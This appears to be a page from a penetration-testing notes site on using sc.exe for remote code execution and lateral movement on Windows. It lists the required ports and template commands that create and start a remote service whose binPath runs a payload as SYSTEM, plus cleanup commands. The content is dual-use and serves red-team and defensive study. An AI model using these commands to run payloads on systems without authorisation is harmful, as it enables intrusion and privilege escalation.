sc.exe

sc.exe uses the following ports:

135/TCP, 49152-65535/TCP (DCE/RPC)
445/TCP (RPC over SMB Named Pipes)
139/TCP (RPC over SMB Named Pipes)

It requires the supplied username and password to be part of the Administrators group.

Additional note

sc.exe connects to the Service Control Manager, which is a privileged system process that by default, runs as NT AUTHORITY\SYSTEM (highest privileged user in the local system). Thus, a payload executed with the binPath option will run as this user, and can provide attackers with the highest privileged shell (if the payload is configured appropriately) - essentially same as a shell as the root user in Unix-like systems.

Basic commands


# create
sc.exe \\TARGET create <servicename> binPath= "<service_bin_file" start= auto

# start
sc.exe \\TARGET start <servicename>

binPath : Specifies a path to the service binary file. This value can be used to perform remote code execution too
start : Specifies the start type for the service. Refer to the documentation link above for the full list of available options.
- auto specifies a service that automatically starts each time the computer is restarted and runs even if no one logs on to the computer.

Cleanup

sc.exe \\TARGET stop <servicename>
sc.exe \\TARGET delete <servicename>

PreviousWinRM Nextschtasks

Last updated 22 hours ago